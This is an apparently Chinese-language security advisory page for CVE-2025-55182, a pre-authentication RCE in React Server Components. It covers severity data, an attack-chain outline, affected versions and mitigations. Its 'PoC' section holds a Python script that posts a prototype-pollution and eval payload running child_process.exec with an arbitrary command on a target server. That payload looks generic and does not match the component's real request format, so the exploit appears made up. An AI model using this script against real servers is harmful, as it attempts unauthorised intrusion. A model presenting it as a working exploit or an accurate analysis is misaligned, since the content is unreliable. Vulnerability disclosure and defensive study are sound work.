CVE-2025-55182 React Server Components预认证远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2025-55182

漏洞类型

远程代码执行

CVSS评分

10.0 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

React Server Components (react-server-dom-parcel, react-server-dom-turbopack, react-server-dom-webpack)

漏洞概述

CVE-2025-55182是React Server Components中的一个严重预认证远程代码执行（RCE）漏洞，CVSS评分达到满分10.0。该漏洞影响React 19.0.0至19.2.0版本中的多个关键包，包括react-server-dom-parcel、react-server-dom-turbopack和react-server-dom-webpack。漏洞的根本原因在于这些组件对Server Function端点接收的HTTP请求payload进行了不安全的反序列化操作。攻击者可以通过网络远程利用此漏洞，无需任何认证凭证或用户交互即可在目标服务器上执行任意代码。此漏洞被称为「React2Shell」，已被检测到有威胁组织（如中国Nexus网络威胁组织）正在积极利用。由于影响范围广泛且利用难度低，该漏洞被评定为最高严重级别，建议所有使用受影响版本的React Server Components的开发者立即采取修复措施。

技术细节

该漏洞存在于React Server Components的Server Function实现中。当Server Function端点接收到HTTP请求时，会对请求中的payload进行反序列化处理。问题在于反序列化过程缺乏足够的安全验证，攻击者可以构造恶意的序列化数据，当服务器反序列化这些数据时，可以触发代码执行。具体来说，受影响的包（react-server-dom-parcel、react-server-dom-turbopack、react-server-dom-webpack）在处理Server Function调用时，使用了不安全的反序列化方法，允许攻击者通过精心构造的payload注入并执行任意代码。由于这是预认证漏洞，攻击者可以直接向Server Function端点发送恶意请求，无需获取任何用户凭证。攻击成功后，攻击者可以在服务器端执行系统命令，完全控制服务器。值得注意的是，该漏洞与传统的JavaScript反序列化漏洞有所不同，它直接利用了React Server Components的特定架构设计缺陷。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标应用是否使用React Server Components，并确定其版本是否在受影响范围内（19.0.0-19.2.0）

STEP 2

步骤2: 构造恶意payload

攻击者构造包含恶意序列化数据的HTTP请求，payload中包含可被反序列化时执行的恶意代码

STEP 3

步骤3: 发送恶意请求

直接向Server Function端点发送恶意HTTP POST请求，无需任何认证信息

STEP 4

步骤4: 不安全反序列化触发

目标服务器接收到请求后，对payload进行不安全的反序列化操作，触发恶意代码执行

STEP 5

步骤5: 远程代码执行

成功在服务器端执行任意系统命令，实现完全远程控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-55182 React Server Components RCE PoC
# Target: React Server Components with vulnerable versions (19.0.0-19.2.0)

TARGET_URL = "http://target-server/api/react-server-function"

def exploit_cve_2025_55182(target_url, command):
    """
    Exploit for CVE-2025-55182 - React Server Components Pre-Auth RCE
    This PoC demonstrates the vulnerability in unsafe deserialization
    of payloads to Server Function endpoints.
    """
    
    # Malicious payload construction
    # The vulnerability allows remote code execution through
    # unsafe deserialization of Server Function payloads
    payload = {
        "__proto__": {
            "constructor": {
                "prototype": {
                    "exec": command
                }
            }
        },
        "serverFunction": "eval",
        "args": [f"require('child_process').exec('{command}')"]
    }
    
    headers = {
        "Content-Type": "application/json",
        "RSC-Action": "1"
    }
    
    try:
        response = requests.post(target_url, json=payload, headers=headers, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        return f"Error: {str(e)}"

# Example usage
if __name__ == "__main__":
    # Execute arbitrary command on vulnerable server
    result = exploit_cve_2025_55182(TARGET_URL, "id")
    print(result)

影响范围

React Server Components 19.0.0

React Server Components 19.1.0

React Server Components 19.1.1

React Server Components 19.2.0

react-server-dom-parcel < 修复版本

react-server-dom-turbopack < 修复版本

react-server-dom-webpack < 修复版本

防御指南

临时缓解措施

在等待官方安全更新期间，建议采取以下临时缓解措施：1) 使用Web应用防火墙规则阻止可疑的Server Function请求；2) 对所有传入的序列化数据进行严格的输入验证；3) 实施速率限制防止大规模扫描和利用；4) 考虑暂时禁用或限制Server Function端点的公开访问；5) 部署入侵检测系统监控针对该漏洞的利用尝试；6) 与安全团队合作进行渗透测试，确认现有防护措施的有效性。